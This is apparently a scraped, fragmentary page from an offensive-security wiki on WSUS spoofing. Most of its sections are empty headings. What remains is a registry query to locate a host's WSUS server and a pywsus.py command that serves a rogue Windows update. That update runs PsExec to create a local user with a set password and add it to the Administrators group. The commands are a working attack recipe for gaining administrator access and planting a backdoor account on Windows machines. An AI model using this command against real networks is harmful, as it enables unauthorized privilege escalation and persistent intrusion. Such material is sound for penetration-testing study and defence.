WSUS spoofing
Theory
Practice
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v wuserverPreparing the evil WSUS
python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser somepassword /add && net localgroup Administrators testuser /add"'Poisoning and hijacking
Triggering Windows update
Alternative attack
Resources
Last updated
Was this helpful?